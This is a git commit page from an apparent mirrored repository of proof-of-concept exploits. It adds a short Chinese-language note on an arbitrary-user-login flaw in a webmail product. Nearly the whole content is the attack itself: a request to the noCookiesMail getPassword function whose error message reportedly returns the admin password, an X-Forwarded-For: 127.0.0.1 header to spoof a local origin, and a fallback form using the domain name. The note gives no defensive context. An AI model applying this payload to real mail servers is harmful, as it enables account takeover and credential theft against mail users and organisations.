mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:34:54 +08:00
Create WEBMAIL存在任意用户登录漏洞.md
This commit is contained in:
parent
a076dda9f5
commit
1637ac33fb
11
WEBMAIL存在任意用户登录漏洞.md
Normal file
11
WEBMAIL存在任意用户登录漏洞.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
## WEBMAIL存在任意用户登录漏洞
|
||||||
|
|
||||||
|
```
|
||||||
|
RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
|
||||||
|
回显errormsg为密码
|
||||||
|
用户名为 admin
|
||||||
|
添加头 X-Forwarded-For: 127.0.0.1
|
||||||
|
|
||||||
|
如果有登录失败的话,使用
|
||||||
|
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user